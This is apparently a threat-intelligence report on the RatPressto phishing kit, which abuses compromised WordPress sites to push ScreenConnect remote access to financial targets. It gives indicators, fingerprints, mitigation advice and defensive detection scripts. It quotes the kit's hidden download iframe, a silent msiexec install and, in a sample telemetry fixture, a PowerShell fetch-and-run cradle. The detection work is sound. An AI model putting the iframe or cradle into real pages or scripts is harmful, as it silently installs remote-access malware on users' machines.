Fortra Intelligence and Research Experts (FIRE) have discovered an active phishing campaign leveraging a reusable Adobe-themed phishing kit deployed across multiple compromised WordPress websites. Threat actors have been using the kit to distribute remote access tooling, primarily ScreenConnect, through staged social engineering workflows designed to mimic legitimate Adobe Document Cloud delivery notifications.
FIRE has dubbed this phishing kit RatPressto: it is hosted on WordPress sites and pushes a ScreenConnect-based remote access trojan (RAT) through a hidden iframe, as if by magic (presto).
RatPressto has been observed targeting financial organizations, looking to silently exfiltrate credentials, secrets, and sensitive data that could be used to aid further compromise.
Analysis confirms that the phishing infrastructure is highly standardized across deployments. Multiple compromised websites were observed hosting byte-identical phishing pages with only victim-specific filenames modified between campaigns. The operation uses legitimate services such as GitHub for payload staging and ScreenConnect for remote access, significantly reducing detection rates by blending malicious activity into normal enterprise traffic.
A notable operational pattern identified during the investigation is that several compromised WordPress environments exposed administrative functionality publicly through accessible wp-admin interfaces. This strongly suggests weak administrative security practices or previously compromised administrator credentials were leveraged to deploy the phishing kit.
The RatPressto phishing kit operates as a two-stage delivery framework:
A fake Adobe document delivery confirmation page persuades the victim that a secure file has already been downloaded.
A hidden iframe silently downloads the payload in the background while the victim is instructed to open the file manually.
The campaign demonstrates a mature operational structure including:
Reusable phishing kit infrastructure
Victim-specific payload naming
Use of legitimate signed binaries
Self-hosted command-and-control infrastructure
Cloudflare telemetry integration
Multi-domain deployment capability
Social engineering customization based on target context
Infrastructure analysis and language indicators suggest likely Brazilian actor involvement with infrastructure linked to São Paulo.
Introduction
Fortra Intelligence and Research Experts (FIRE) have identified a new private phishing kit being used to impersonate and target large corporations. The RatPressto phishing kit was discovered during an investigation that followed the identification of several phishing emails impersonating legitimate or fabricated corporate senders.
The emails directed victims to compromised WordPress websites hosting a staged phishing kit designed to deliver a ScreenConnect-based remote access payload. ScreenConnect itself is legitimate, signed remote-administration software; deployed this way it functions as a remote access trojan (RAT), and in this campaign it is used primarily to exfiltrate sensitive data that can aid further compromise, effectively operating as an infostealer.
Unlike traditional phishing campaigns that rely solely on malicious attachments, this operation uses a multi-stage web-based delivery framework hosted on legitimate but compromised websites. The threat actor combines social engineering, infrastructure reuse, and trusted enterprise software abuse to maximize infection success while minimizing detection.
The analysis focused on:
WordPress-hosted phishing kit deployments
HTML and PHP source code reuse
Infrastructure overlap
Payload delivery mechanisms
Command-and-control evolution
ScreenConnect abuse
GitHub staging infrastructure
Victim deception techniques
Operational fingerprints
The investigation identified several strong forensic indicators linking all deployments to a single private phishing kit.
First, let's go over the attack flow of the RatPressto kit; we'll then take a deeper dive into some of the artifacts and indicators and what they can tell us about the active campaign.
Email Template Analysis
The phishing emails associated with this campaign follow a highly consistent and reusable template structure. Across multiple observed samples, the message body maintains nearly identical wording, with only minor variations in sender identity, branding, or embedded URLs.
A recurring characteristic is the use of a generic greeting:
“Hello,”
The body then immediately introduces a confidentiality-themed pretext designed to create urgency and legitimacy:
“For confidentiality and due to file size constraints, the project document has been uploaded to Adobe Document Cloud. Please use the link below to review it.”
This social engineering technique attempts to normalize the use of external download portals while discouraging scrutiny of the attachment or link source.
The email then presents a “VIEW FILE” button or hyperlink which redirects the victim to the phishing infrastructure. In most observed cases, the destination is a compromised WordPress website hosting the phishing kit; however, some deployments were observed on standalone PHP servers or non-WordPress infrastructure. Despite changes in hosting environments, the wording and structure of the lure remain consistent across deployments.
The template concludes with an additional trust-building statement:
“Please advise if there are any access issues.”
This sentence creates the false impression of an active communication channel or legitimate business interaction. However, no evidence was observed of follow-up communication from the actor after initial delivery.
Most samples terminate with a professional closing such as:
“Kind regards,”
The uniformity of the email structure across multiple campaigns strongly suggests the use of a standardized phishing kit or reusable Business Email Compromise (BEC) template framework.
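The template features above (generic greeting, confidentiality pretext, a "VIEW FILE" call to action that points away from Adobe, the access-issues closer) are enough to write a first-pass triage check. The script below is an added example for this page, not part of the original report and not Fortra tooling. It parses a raw message, normalises the body text, looks for the quoted template phrases, and flags a "VIEW FILE" link whose target host is not Adobe-owned. The sample message is constructed for illustration, its link host (compromised-site.example) is a placeholder rather than an observed indicator, and the list of Adobe-owned hosts treated as legitimate is an assumption.

```python
"""Triage check for the Adobe Document Cloud lure template described above.
Added example for this page; it is not part of the original report and not
Fortra tooling. The message below is constructed for illustration, and the
link host in it (compromised-site.example) is a placeholder, not an observed
indicator. The list of Adobe-owned hosts treated as legitimate is an assumption."""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Phrases quoted from the observed template, matched case-insensitively
# after whitespace normalisation so line wrapping does not hide them.
LURE_PHRASES = (
    "for confidentiality and due to file size constraints",
    "uploaded to adobe document cloud",
    "please advise if there are any access issues",
)
# Assumption: a genuine Adobe share link points at an Adobe-owned host.
ADOBE_HOSTS = ("adobe.com", "acrobat.com")


class _LinkCollector(HTMLParser):
    """Collect (href, anchor text) pairs so link text can be compared with the target host."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join(self._text).strip()))
            self._href = None


def _is_adobe_host(host):
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in ADOBE_HOSTS)


def triage(raw_message):
    """Return the template matches found in one raw RFC 5322 message (bytes)."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    part = msg.get_body(preferencelist=("html", "plain"))
    html = part.get_content() if part is not None else ""
    text = " ".join(re.sub(r"<[^>]+>", " ", html).split()).lower()

    findings = [f"lure phrase: {p}" for p in LURE_PHRASES if p in text]
    if text.startswith("hello,"):
        findings.append("generic greeting")

    collector = _LinkCollector()
    collector.feed(html)
    for href, anchor in collector.links:
        host = urlparse(href).hostname or ""
        # The lure's call to action names Adobe but points elsewhere.
        if "view file" in anchor.lower() and not _is_adobe_host(host):
            findings.append(f"VIEW FILE link to non-Adobe host: {host}")

    # Two independent template features are required, so a legitimate
    # Adobe share that merely uses a similar phrase is not flagged.
    return {"suspicious": len(findings) >= 2, "findings": findings}


# Constructed sample message carrying the observed template wording.
SAMPLE_MESSAGE = b"""\
From: Accounts <accounts@sender.example>
To: victim@target.example
Subject: Project document
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Hello,</p>
<p>For confidentiality and due to file size constraints, the project document
has been uploaded to Adobe Document Cloud. Please use the link below to review it.</p>
<p><a href="https://compromised-site.example/download.html">VIEW FILE</a></p>
<p>Please advise if there are any access issues.</p>
<p>Kind regards,</p>
</body></html>
"""

if __name__ == "__main__":
    for line in triage(SAMPLE_MESSAGE)["findings"]:
        print(line)
```

The link-text versus link-host comparison is the part worth keeping even if the wording of the lure changes: a button that says "VIEW FILE" under an Adobe Document Cloud pretext but resolves to a WordPress host is the mismatch that survives template edits.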
Threat Landscape
Phishing operations increasingly rely on legitimate web infrastructure and signed software to bypass modern detection controls. Rather than deploying custom malware families, many actors now abuse legitimate remote administration tools such as:
ScreenConnect
ISL Online
LogMeIn
Tiflux
This campaign aligns with that broader trend but distinguishes itself through the operational maturity of its phishing kit.
The actor operates a reusable framework capable of rapid deployment across compromised WordPress sites. The phishing pages are visually convincing, professionally structured, and engineered to simulate Adobe document workflows.
A particularly important observation is that several of the compromised websites exposed accessible WordPress administrative interfaces (wp-admin). This indicates either:
Weak WordPress administration security
Credential theft against site administrators
Existing webshell persistence
Vulnerable plugins/themes enabling administrative compromise
The repeated exposure of wp-admin functionality across multiple compromised sites suggests that WordPress administrative compromise may be part of the actor’s operational workflow.
The campaign also demonstrates increasing operational sophistication through:
Migration from ScreenConnect cloud relays to self-hosted C2 infrastructure
GitHub-based payload hosting
Victim-specific lure customization
Multi-stage download orchestration
Cloudflare telemetry integration
Standardized reusable source code
Attribution Assessment
Confidence: Medium
Suspected Origin: Brazil
| Indicator | Evidence |
| --- | --- |
| Hosting Infrastructure | ampliawifi.com → 177.154.191.148 (São Paulo, BR) |
| Nameserver | c3po3090.com.br – self-operated cPanel infrastructure |
| Language Indicators | Portuguese infrastructure references and naming conventions |
| Infrastructure Overlap | Shared hosting and deployment patterns |
| TTP Alignment | Consistent with Brazilian phishing and BEC activity |
Infrastructure linked to the operation includes:
ampliawifi.com
gaheempreendimentos.com
c3po3090.com.br
cloud.zistopstoabetterlife.com
The actor appears to maintain both compromised victim infrastructure and actor-controlled infrastructure.
Infrastructure Overview
Actor Infrastructure
Hosting and DNS
177.154.191.148 – São Paulo, Brazil
HOSTGNOME-AS infrastructure
Self-managed cPanel/WHM services
Dovecot/Exim mail infrastructure
Actor-Controlled Domains
| Domain | Role |
| --- | --- |
| ampliawifi.com | WordPress deployment |
| gaheempreendimentos.com | Cloudflare-protected deployment |
| c3po3090.com.br | Nameserver infrastructure |
Compromised Sites Used as Payload Hosts
| Domain | Role |
| --- | --- |
| iconclinic.ae | WordPress site, wp-admin exposed |
| kinorot.co.il | Likely compromised victim infrastructure |
| vetcarebd.xyz | Payload delivery host |
| nabellacouture.com | Payload delivery host |
| birexo.icu | Additional phishing kit deployment |
| abpmed.com | Additional phishing kit deployment |
Important Observation – Exposed WordPress Administration
The recovered infrastructure strongly indicates that the actor is abusing poorly secured WordPress environments to deploy the phishing kit.
Multiple sites exposed:
/wp-admin/
Administrative WordPress assets
Elementor management components
Public WordPress login functionality
This pattern is operationally significant because it suggests the actor either:
Compromised administrator credentials
Leveraged vulnerable plugins/themes
Uploaded phishing kit files directly through WordPress administrative panels
Maintains persistence through WordPress administrative access
The consistency of exposed administrative functionality across multiple unrelated victim sites strongly supports the theory that WordPress administrative compromise is part of the actor’s deployment workflow.
Additionally, the phishing kit files themselves (download.html, complete.php, download.php) appear deployed directly into WordPress-accessible directories, further reinforcing the likelihood of administrative-level access.
Several recovered deployments also included Elementor-related metadata and Yoast SEO remnants, indicating that the kit was dropped into existing, otherwise legitimate WordPress content rather than onto a purpose-built site, which leaves the phishing pages blended in among the victim site's own pages.
Phishing Kit Analysis
Newly Recovered HTML Samples
Additional recovered HTML samples provided during the investigation further confirm that the actor is operating a reusable and actively maintained phishing framework. The recovered pages contain the same operational patterns previously observed across the campaign, including:
Adobe-themed branding
Hidden iframe-based payload delivery
Reused JavaScript redirect logic
Shared CSS structures
Cloudflare telemetry beacons
Background image reuse
Victim-specific filename substitution
Silent payload download workflows
The recovered files also demonstrate that the phishing kit is continuing to evolve operationally.
New Operational Behaviors Identified
Anti-Analysis / Visitor Filtering
One recovered HTML file introduces basic anti-analysis and visitor filtering logic. The page performs:
Mobile device detection using User-Agent analysis
IP-based filtering against hardcoded IP addresses
Automatic redirection away from the phishing workflow
Blocked users are redirected to:
https://www.easternbank.com/
This behavior suggests the actor is attempting to reduce automated analysis visibility and to prevent execution on mobile devices, where the Windows payload would not run.
Observed blocked IPs include:
162.158.63.162
162.158.63.161
162.158.63.160
All three addresses fall within 162.158.0.0/15, Cloudflare's published address space, so the list blocks specific Cloudflare-sourced requests rather than a broad researcher range.
The script retrieves the victim IP using:
https://api.ipify.org?format=json
Because the lookup runs in the victim's browser and compares the result against a static list, the gate is weak against a deliberate analyst (the user agent is under the analyst's control and the list can be read from the page source), but the ipify request itself is a useful network indicator when it immediately precedes a file download from a WordPress host. This represents an escalation in operational maturity compared to the earlier kit versions.
Cloudflare Telemetry Expansion
The newly recovered samples contain an additional Cloudflare Insights beacon:
fcfd0b3135e24171980eef5488a4927b
This differs from previously observed Cloudflare telemetry tokens and suggests:
Multiple operational deployments
Potential infrastructure rotation
Separate tracking instances per campaign
Continued actor monitoring of victim interactions
Victim-Specific Payload Naming
Recovered payload references include:
CapraAssetManagementInc.vbs
ScreenConnect.ClientSetup.msi
This further supports the assessment that the actor customizes filenames to match the victim’s expected business context.
Hidden Iframe Persistence
The recovered HTML again confirms the continued use of hidden iframe delivery:
<iframe src="download.php" style="display:none;"></iframe>
This mechanism remains one of the most important forensic fingerprints of the phishing kit.
Shared Developer Artifacts
The additional HTML samples preserve the same developer artifacts identified previously:
Title: Background Image Page
Shared CSS classes
2000ms redirect delay
Adobe-themed assets
Reused loading logic
Byte-identical structure
These artifacts continue to provide strong attribution confidence linking the deployments to the same phishing kit family.
Phishing Kit Analysis
Shared Template Infrastructure
Analysis confirmed that all observed phishing pages were nearly byte-identical.
Shared elements include:
CSS classes: .info-text, .highlight, .spinner, .confirmationModal
Accent color: #1e4dbd
Adobe branding assets
Shared JavaScript workflow
Identical redirect timing logic
Hidden iframe delivery mechanism
The only consistent variation between deployments is the victim-specific filename used to disguise the payload.
This strongly indicates:
A centralized private phishing kit
Standardized deployment procedures
Single operator or tightly coordinated actor group
Stage 1 – Fake Adobe Delivery Page
Victims arriving at the phishing page are presented with:
Adobe-themed branding
“Download Complete” messaging
Fake secure document notification
Instructions to open a downloaded file
Simulated loading behavior
The page uses the JavaScript function:
submitForm()
This function:
Hides the download button
Displays a loading spinner
Redirects the victim after 2000ms
The delay has no technical purpose and exists purely for social engineering.
Stage 2 – Silent Download Trigger
The second-stage page silently triggers payload delivery using a hidden iframe:
<iframe src="download.php" style="display:none;"></iframe>
This mechanism requests the payload automatically, without any click on the page. The file still surfaces in the browser's download UI, which is exactly what the visible instructions rely on: the victim is told that a secure file has already been downloaded and should now be opened, so the download prompt reads as expected behaviour rather than as a warning.
Forensic Fingerprints
Background Image Artifact
One of the strongest forensic indicators is the repeated use of the image:
Screenshot 2025-04-25 161700.png
This filename appears across all observed deployments.
The image is not a stock asset but appears to be a locally captured screenshot retained by the phishing kit author.
This creates a high-confidence attribution artifact.
Dead Code Artifact
All deployments contain an unused CSS class:
.highlight {
font-weight: bold;
color: #1e4dbd;
}
The class is never referenced by the HTML.
This dead code serves as an additional fingerprint linking deployments together.
Developer Artifact
Stage 1 pages use the title:
<title>Background Image Page</title>
This appears to be an accidental developer artifact left unchanged across deployments.
Stage 2 pages instead use:
<title>Adobe Plugin Required</title>
The inconsistency itself becomes a reusable forensic indicator.
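The artifacts in the Shared Template Infrastructure, Stage 1/Stage 2, Anti-Analysis and Forensic Fingerprints sections are all static strings or structures in the served HTML, so they can be turned into a scanner that a responder runs over recovered pages or a web-root crawl. The script below is an added example for this page; it is not the kit's code and not Fortra tooling. It matches the listed indicators with weighted patterns, adds a structural check for the dead .highlight class (defined in the stylesheet, referenced by no element), and returns a score and verdict. SAMPLE_PAGE is a constructed fixture that carries several of the artifacts for the purpose of the demonstration, not a recovered file; the weights and the verdict threshold are assumptions.

```python
"""Static fingerprint scanner for the RatPressto page artifacts described
above (hidden download.php iframe, Background Image Page / Adobe Plugin
Required titles, the Screenshot 2025-04-25 161700.png asset, the dead
.highlight class, the #1e4dbd accent, the 2000 ms redirect, the ipify and
easternbank.com filtering strings and the Cloudflare beacon token). Added
example for this page; it is not the kit's code and not Fortra tooling.
SAMPLE_PAGE is a constructed fixture carrying several of those strings; it
is not a recovered file. Weights and the verdict threshold are assumptions."""
import re

# (name, pattern, weight). Structural artifacts unique to the kit weigh
# more than generic ones such as a colour code or a CSS class name.
FINGERPRINTS = [
    ("hidden_iframe_download_php",
     r"<iframe(?=[^>]*src=['\"]download\.php['\"])(?=[^>]*display\s*:\s*none)[^>]*>", 3),
    ("background_screenshot_asset", r"Screenshot 2025-04-25 161700\.png", 3),
    ("title_background_image_page", r"<title>\s*Background Image Page\s*</title>", 2),
    ("title_adobe_plugin_required", r"<title>\s*Adobe Plugin Required\s*</title>", 2),
    ("cloudflare_beacon_fcfd0b31", r"fcfd0b3135e24171980eef5488a4927b", 2),
    ("accent_color_1e4dbd", r"#1e4dbd\b", 1),
    ("kit_css_classes", r"\.(info-text|spinner|confirmationModal)\b", 1),
    ("redirect_delay_2000ms", r"setTimeout\s*\([\s\S]*?,\s*2000\s*\)", 1),
    ("ipify_lookup", r"api\.ipify\.org\?format=json", 1),
    ("easternbank_bailout", r"https://www\.easternbank\.com/", 1),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), w) for name, pat, w in FINGERPRINTS]


def highlight_class_is_dead(html):
    """True when .highlight is defined in a stylesheet but no element uses it."""
    defined = re.search(r"\.highlight\s*\{", html) is not None
    used = re.search(r"class\s*=\s*['\"][^'\"]*\bhighlight\b", html) is not None
    return defined and not used


def scan(html):
    """Score one HTML document against the kit fingerprints."""
    matches = [name for name, rx, _ in COMPILED if rx.search(html)]
    score = sum(w for name, _, w in COMPILED if name in matches)
    if highlight_class_is_dead(html):
        matches.append("dead_highlight_class")
        score += 2
    # A verdict needs one of the two structural artifacts plus corroboration;
    # the colour code or class names alone appear on plenty of benign sites.
    structural = {"hidden_iframe_download_php", "background_screenshot_asset"}
    kit_match = score >= 5 and bool(structural & set(matches))
    return {"score": score, "matches": matches, "kit_match": kit_match}


# Constructed fixture: carries the report's artifact strings, not a recovered page.
SAMPLE_PAGE = """<!DOCTYPE html>
<html><head><title>Background Image Page</title>
<style>
body { background: url('Screenshot 2025-04-25 161700.png') no-repeat center; }
.info-text { font-size: 16px; }
.highlight { font-weight: bold; color: #1e4dbd; }
.spinner { display: none; }
.confirmationModal { display: none; }
</style>
<script>
function submitForm() {
  document.getElementById('dl').style.display = 'none';
  document.querySelector('.spinner').style.display = 'block';
  setTimeout(function () { window.location.href = 'complete.php'; }, 2000);
}
</script>
</head>
<body>
<p class="info-text">Your secure document has been downloaded.</p>
<button id="dl" onclick="submitForm()">Open document</button>
<iframe src="download.php" style="display:none;"></iframe>
</body></html>
"""

if __name__ == "__main__":
    print(scan(SAMPLE_PAGE))
```

Run it over every .html and .php file under a suspect WordPress document root; the two weight-3 artifacts are the ones to escalate on, and the dead-class check is the cheapest way to separate this kit from an unrelated page that merely reuses the Adobe colour.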
Infection Chain
Stage 0 – Initial Access
Victims receive phishing emails impersonating Adobe Document Cloud notifications.
The email instructs victims to review a “secured document” hosted externally.
Stage 1 – Compromised WordPress Site
Victims are redirected to a phishing page hosted on a compromised WordPress website.
Stage 2 – Silent Payload Download
The phishing kit automatically downloads:
MSI payloads
EXE droppers
BAT scripts
ScreenConnect installers
Stage 3 – GitHub Loader
GitHub repositories associated with the actor host additional payloads.
Observed repositories:
creativebobo/ceoexe
creativebobo/ceo
Stage 4 – ScreenConnect Installation
The malware silently installs ScreenConnect components and establishes persistence.
Stage 5 – Command and Control
The infected system connects to:
cloud.zistopstoabetterlife.com:8041
This represents a migration away from standard ScreenConnect cloud relays toward self-hosted infrastructure.
Stage 6 – Actions on Objectives
ScreenConnect gives the operator full interactive control of the infected machine, including the ability to create, modify, or delete files and to transfer them off the host. The most likely action on objective is therefore exfiltration: harvested credentials and reconnaissance data can be used to support further compromise, and, in a less likely scenario, sensitive organizational data could be taken for extortion purposes.
Stealth and Evasion Techniques
| Technique | Behavior | MITRE |
| --- | --- | --- |
| Obfuscation | Heavily obfuscated BAT dropper | T1140 |
| Self-deletion | Payload cleanup after execution | T1070.004 |
| Silent Installation | msiexec /qn /norestart | T1218.007 |
| Hidden Execution | No visible UI/tray icon | T1564.003 |
| Signed Binary Abuse | Legitimate ScreenConnect binaries | T1218 |
| Masquerading | Victim-specific filenames | T1036 |
| Remote Access Software Abuse | ScreenConnect | T1219 |
MITRE ATT&CK Mapping
| Tactic | Technique | ID |
| --- | --- | --- |
| Initial Access | Spearphishing Link | T1566.002 |
| Execution | User Execution: Malicious File | T1204.002 |
| Execution | PowerShell | T1059.001 |
| Defense Evasion | Deobfuscate/Decode Files or Information | T1140 |
| Defense Evasion | File Deletion | T1070.004 |
| Defense Evasion | Hidden Window | T1564.003 |
| Defense Evasion | Masquerading | T1036 |
| Persistence | Windows Service | T1543.003 |
| Command and Control | Remote Access Software | T1219 |
| Command and Control | Encrypted Channel | T1573 |
The lure emails carry a link to the phishing page rather than an attachment, so initial access maps to Spearphishing Link (T1566.002); the msiexec-driven install maps to the Msiexec sub-technique of System Binary Proxy Execution (T1218.007).
Indicators of Compromise (IOCs)
Domains
cloud.zistopstoabetterlife.com
iconclinic.ae
ampliawifi.com
gaheempreendimentos.com
vetcarebd.xyz
nabellacouture.com
birexo.icu
abpmed.com
c3po3090.com.br
Infrastructure
84.32.41.64
177.154.191.148
File Artifacts
ScreenConnect.ClientSetup.msi
microsoftceo.exe
ceo.msi
WordPress Paths
/wp-admin/
/download.html
/complete.php
/download.php
Detection Opportunities
WordPress Monitoring
Organizations should monitor for:
Unexpected /wp-admin/ exposure
Unauthorized PHP uploads
Unknown subdirectories under WordPress roots
Hidden iframe injections
Adobe-themed phishing pages
Newly created upload directories
Network Detection
Alert on:
ScreenConnect traffic to relay hosts outside the approved ScreenConnect inventory
Outbound TCP 8041 connections to hosts that are not the organisation's own ScreenConnect instance (8041 is ScreenConnect's default relay port, so the port alone is expected wherever ScreenConnect is sanctioned; the destination host is what matters)
GitHub raw file downloads from repositories with no business justification, particularly when initiated by script interpreters
Endpoint Detection
Hunt for:
ScreenConnect Client services
msiexec launched from TEMP directories
PowerShell download cradle activity
Recently created MSI installers
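The network and endpoint hunts above reduce to a handful of rules over process-creation and network-connection telemetry. The script below is an added example for this page, not part of the original report and not a vendor product; it runs those rules over constructed JSON-lines events and shows the two false-positive controls a practitioner needs: the msiexec rule fires only for a quiet install from a temp directory, and the ScreenConnect rules key on the relay destination rather than on port 8041 alone. Assumptions: the event field names used below; that the ScreenConnect client passes its relay as "h=<host>&p=<port>" inside the query-string blob on its command line; and APPROVED_RELAYS, a placeholder for the organisation's own sanctioned ScreenConnect instance. The GitHub URL, client folder name and GUID/key values in the fixture are placeholders, not observed indicators.

```python
"""Detection logic for the network and endpoint hunts listed above, run over
constructed telemetry. Added example for this page; not part of the original
report and not a vendor product. Assumptions: events are JSON lines with the
fields used below; the ScreenConnect client passes its relay as
"h=<host>&p=<port>" in the query-string blob on its command line;
APPROVED_RELAYS holds the organisation's own sanctioned ScreenConnect
instance and is a placeholder. The GitHub URL, client folder name and
GUID/key values in the fixture are placeholders, not observed indicators."""
import json
import re
from urllib.parse import parse_qs

APPROVED_RELAYS = {"screenconnect.corp.example"}  # placeholder (assumption)

TEMP_DIR = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.I)
SILENT_MSI = re.compile(r"(^|\s)/(qn|quiet|q)\b", re.I)
GITHUB_RAW = re.compile(
    r"https?://(raw\.githubusercontent\.com|github\.com/[^/\s]+/[^/\s]+/(raw|releases/download))/", re.I)
CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bcurl\b)", re.I)


def relay_from_cmdline(cmd):
    """Extract (host, port) from a ScreenConnect client command line, or None."""
    m = re.search(r"\?([^\"\s]+)", cmd)  # the ?e=...&h=...&p=... blob
    if not m:
        return None
    params = parse_qs(m.group(1))
    host, port = params.get("h", [None])[0], params.get("p", [None])[0]
    return (host.lower(), int(port)) if host and port and port.isdigit() else None


def evaluate(event):
    """Return the rule names one event trips; an empty list means no alert."""
    alerts = []
    if event.get("type") == "process":
        exe = event.get("image", "").lower().rsplit("\\", 1)[-1]
        cmd = event.get("command_line", "")
        # Quiet MSI install of a package staged in a temp directory.
        if exe == "msiexec.exe" and SILENT_MSI.search(cmd) and TEMP_DIR.search(cmd):
            alerts.append("silent_msi_from_temp")
        # ScreenConnect client pointed at a relay that is not ours.
        if exe.startswith("screenconnect."):
            relay = relay_from_cmdline(cmd)
            if relay and relay[0] not in APPROVED_RELAYS:
                alerts.append(f"screenconnect_unapproved_relay:{relay[0]}:{relay[1]}")
        if exe in ("powershell.exe", "pwsh.exe") and CRADLE.search(cmd):
            alerts.append("powershell_download_cradle")
        if GITHUB_RAW.search(cmd):
            alerts.append("github_raw_download")
    elif event.get("type") == "network":
        host = (event.get("dest_host") or event.get("dest_ip") or "").lower()
        # 8041 is ScreenConnect's default relay port: alert on the destination, not the port alone.
        if event.get("dest_port") == 8041 and host not in APPROVED_RELAYS:
            alerts.append(f"port_8041_to_unapproved_host:{host}")
    return alerts


def run(lines):
    """Evaluate JSON-lines telemetry; returns [(event id, rule name), ...]."""
    out = []
    for line in lines:
        if line.strip():
            ev = json.loads(line)
            out.extend((ev["id"], a) for a in evaluate(ev))
    return out


# Constructed telemetry. evt4 (sanctioned relay) and evt6 (quiet install from a
# software share) are the benign controls and must not alert.
SAMPLE_EVENTS = r"""
{"id": "evt1", "type": "process", "image": "C:\\Windows\\System32\\msiexec.exe", "command_line": "msiexec /i C:\\Users\\jdoe\\AppData\\Local\\Temp\\ceo.msi /qn /norestart"}
{"id": "evt2", "type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/example-user/example-repo/main/stage.ps1')\""}
{"id": "evt3", "type": "process", "image": "C:\\Program Files (x86)\\ScreenConnect Client (0000)\\ScreenConnect.ClientService.exe", "command_line": "\"C:\\Program Files (x86)\\ScreenConnect Client (0000)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=cloud.zistopstoabetterlife.com&p=8041&s=00000000-0000-0000-0000-000000000000&k=REDACTED\""}
{"id": "evt4", "type": "network", "image": "C:\\Program Files (x86)\\ScreenConnect Client (1111)\\ScreenConnect.ClientService.exe", "dest_host": "screenconnect.corp.example", "dest_port": 8041}
{"id": "evt5", "type": "network", "image": "C:\\Program Files (x86)\\ScreenConnect Client (0000)\\ScreenConnect.ClientService.exe", "dest_host": "cloud.zistopstoabetterlife.com", "dest_port": 8041}
{"id": "evt6", "type": "process", "image": "C:\\Windows\\System32\\msiexec.exe", "command_line": "msiexec /i C:\\Software\\approved-agent.msi /qn /norestart"}
"""

if __name__ == "__main__":
    for event_id, rule in run(SAMPLE_EVENTS.splitlines()):
        print(event_id, rule)
```

The relay extraction is the piece worth porting into whatever query language the SIEM speaks: the client's service command line carries the relay host, so a single inventory of approved hosts lets one rule cover both the installation event and the later 8041 connections without alerting on every sanctioned ScreenConnect deployment.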
Mitigation Guidance
Immediate Actions
Block known malicious infrastructure.
Audit WordPress deployments for exposed administrative interfaces.
Disable public access to wp-admin where possible.
Enforce MFA on all WordPress administrator accounts.
Hunt for ScreenConnect installations outside approved inventory.
Monitor GitHub raw download activity.
Review web server logs for suspicious upload activity.
Medium-Term Actions
Deploy WordPress hardening controls.
Restrict administrative access by IP.
Monitor for iframe injection patterns.
Audit plugins and themes.
Implement behavioral detection for LOLBin abuse.
Closing Notes
This campaign demonstrates the continued evolution of phishing operations toward highly reusable infrastructure and trusted software abuse.
The phishing kit identified during this investigation is operationally mature, reusable, and specifically engineered to maximize victim trust while minimizing detection.
The most significant findings include:
Reusable byte-identical phishing kit deployments
Abuse of compromised WordPress infrastructure
Publicly exposed wp-admin interfaces
Hidden iframe-based payload delivery
Victim-specific lure customization
Migration to self-hosted ScreenConnect infrastructure
GitHub-based staging operations
The repeated exposure of WordPress administrative interfaces across compromised websites strongly suggests that insecure or previously compromised WordPress environments play a central role in the actor’s deployment strategy.
Organizations operating WordPress infrastructure should treat exposed wp-admin functionality as a high-risk condition requiring immediate review.
The actor remains active, and additional deployments should be expected.
References
MITRE ATT&CK – T1219 Remote Access Software
MITRE ATT&CK – T1566.002 Spearphishing Link
ConnectWise ScreenConnect Documentation
WordPress Security Hardening Guide
ANY.RUN analysis artifacts